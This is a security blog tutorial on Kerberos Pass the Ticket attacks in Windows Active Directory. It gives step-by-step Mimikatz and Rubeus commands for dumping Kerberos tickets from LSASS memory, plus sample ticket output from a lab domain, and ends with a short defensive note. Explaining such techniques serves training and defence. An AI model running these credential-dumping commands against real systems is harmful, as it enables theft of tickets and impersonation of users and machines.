Pass the Ticket (PtT) from Windows | StrawHat Hackers

Pass the Ticket (PtT) Attack in Windows

Pass the Ticket (PtT) is a technique used for lateral movement in Active Directory. Instead of relying on NTLM hashes, attackers steal and reuse Kerberos tickets to access other systems without authentication prompts.

Kerberos Protocol Overview

Kerberos is an authentication system that allows users to log in once and access multiple services without repeatedly entering their passwords. It achieves this through the use of tickets.

How Kerberos Works

1. Logging in → Obtaining a TGT (Ticket Granting Ticket)

    - The computer sends a login request to the Domain Controller (DC).

    - The DC verifies the user's identity and issues a TGT.

2. Requesting a Service → Obtaining a TGS (Ticket Granting Service Ticket)

    - When the user attempts to access a service (e.g., an MSSQL database), the TGT is presented to the DC.

    - The DC provides a TGS, which grants access to the requested service.

3. Accessing the Service → Using the TGS

    - The computer presents the TGS to the service.

    - The service validates the ticket and grants access without requesting a password.

Pass the Ticket (PtT) Attack

To perform this attack, a valid ticket (TGT or TGS) is required.

How to Steal Kerberos Tickets

On a compromised machine, tools like Mimikatz and Rubeus can extract Kerberos tickets from memory. These tickets are stored in the LSASS process on Windows.

Method 1: Using Mimikatz

Steps to Extract Tickets with Mimikatz

1. Open PowerShell and navigate to the directory containing mimikatz.exe.    

    cd C:\path\to\mimikatz

    .\mimikatz.exe 

    2. Grant privilege to interact with LSASS:

    privilege::debug 

        - If successful, it returns: Privilege '20' ok

3. Extract all Kerberos tickets from memory:

    sekurlsa::tickets /export

        - This command saves the extracted tickets as .kirbi files.

Types of Kerberos Tickets

1. Computer Account Tickets

    - If the ticket ends with $, it belongs to a computer account.

    - Example: DC01$ (indicating the ticket is for the domain controller).

2. User Account Tickets

    - If the ticket contains a username followed by @, it belongs to a user.

Why This Matters?

- Computer account tickets enable machines to communicate with Active Directory.

- User account tickets allow access to services like file shares or web applications.

- Attackers with admin access can steal tickets and use them for Pass-the-Ticket (PtT) attacks to impersonate users.

Method 2: Exporting Kerberos Tickets Using Rubeus

Unlike Mimikatz, Rubeus prints extracted tickets in Base64 format.

Steps to Extract Tickets with Rubeus

1. Navigate to the tool's directory on the compromised machine.

2. Run the following command to dump Kerberos tickets:

    Rubeus.exe dump /nowrap

Example Output:

ServiceName           :  krbtgt/inlanefreight.htb

ServiceRealm          :  inlanefreight.htb

UserName               :  DC01$

UserRealm              :  inlanefreight.htb

StartTime                :  7/12/2022 9:39:54 AM

EndTime                 :  7/12/2022 7:39:54 PM

RenewTill               :  7/19/2022 9:39:54 AM

Flags                       :  renewable, forwardable

KeyType                 :  aes256_cts_hmac_sha1

Base64(key)           :  KWBMpM4BjenjTniwH0xw8FhvbFSf+SBVZJJcWgUKi3w=

Base64EncodedTicket :  doIE1jCCBNKgAwIBBaEDAgEWooID...

Conclusion

Pass the Ticket (PtT) attacks allow adversaries to impersonate users and move laterally within a network. By stealing and reusing Kerberos tickets, attackers can access systems without needing credentials. Defenders should monitor LSASS access and use tools like Windows Defender Credential Guard to protect against such attacks.

content created by Suhail